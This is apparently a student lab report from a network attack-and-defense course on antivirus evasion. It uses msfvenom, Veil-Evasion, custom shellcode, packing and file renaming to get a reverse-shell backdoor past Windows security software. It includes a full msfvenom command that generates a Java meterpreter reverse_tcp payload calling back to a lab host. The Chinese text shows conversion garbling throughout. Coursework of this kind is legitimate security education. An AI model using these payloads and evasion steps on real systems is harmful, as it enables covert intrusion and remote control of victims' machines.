2017-2018-4 20155203《网络对抗技术》Exp3 免杀原理与实践

<script>$( "#cnblogs_post_body" ).catalog()</script>

1.基础问题回答

（1）杀软是如何检测出恶意代码的？ 分析恶意程序的行为特征，分析其代码流将其性质归类于恶意代码

（2）免杀是作什么？ 使恶意代码避免被查杀，也就是要掩盖恶意代码的特征

（3）免杀的基本方法有哪些？ 免杀大概能够分为两种状况：

1. 二进制的免杀（无源码），只能经过经过修改asm代码／二进制数据／其余数据来完成免杀。
2. 有源码的免杀，能够经过修改源代码来完成免杀，也能够结合二进制免杀的技术。

免杀也能够分为这两种状况：

1. 静态文件免杀，被杀毒软件病毒库/云查杀了，也就是文件特征码在病毒库了。
2. 动态行为免杀，运行中执行的某些行为被杀毒软件拦截报读。

2.实践过程记录

2.1 正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧；

- 首先先把上次的后门放在virscan.org上检测一下。

- 生成jar

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.230.144 lport=5203 x> dkxshell.jar

- 下载veil-evasion:

不少人这里可能会出问题，这里推荐一个源：kali国内更新源。更换你的源，并按照这个更新源教程操做更新你的源，而后按照veil安装教程按照veil使用教程找一个网快且稳定的地方作，中间出现什么错误先不要管，只要运行的时候能看到“2 tools ...”"41 payload..."就能够用啦(这句话里不少连接由于模板问题，没有标注，在全文最后有总结).可能你们在安装后再次打开的时候会发现，还须要下载，这个时候输入n（NO）若是报错，就打开/tools/Veil/，运行Veil.py，应该就成功啦。

把Veil生成的小程序放在Win10下，哇厉害了个人电脑管家~

这个安装半天的免杀平台查杀率仍是很高，失去假笑。。。

- shellcode编程

能够看到查杀的几率仍是很高的

- 用C语言编的shellcode攻击win10

是这样的我只能在win10上下载VS（相信你们也不能在Win7上安装）因此我关闭了防火墙、杀毒软件，先ping通，回连成功！

- linux交叉编译

- 加壳

几率很高嘛，一会尝试一下压缩veil的可执行文件

2.2 经过组合应用各类技术实现恶意代码免杀

- 加壳+veil-evasion

哇好优秀啊，只有这么一点点，但是个人电脑管家更优秀，我刚放进去就被它识别了，但是我很怀疑，因而我就给它改了个名字。。。而后win10的电脑管家就识别不了了，但win7的电脑管家能够。。。保持假笑。。。我再改（memedadkx）！成了。

2.3 用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本

这个任务和上面那个有什么区别呢。。。 版本：

3.离实战还缺些什么技术或步骤？

你们如今用这种很是初级的Win7的已经不多，并且都会用杀毒软件按期清理查杀，成功的几率要更小。并且免杀的方法并不具备普适性，还须要改进

4.实践总结与体会

Veil-evasion安装教程总结：

• kali国内更新源
• 更新源更新教程
• veil安装教程
• veil使用教程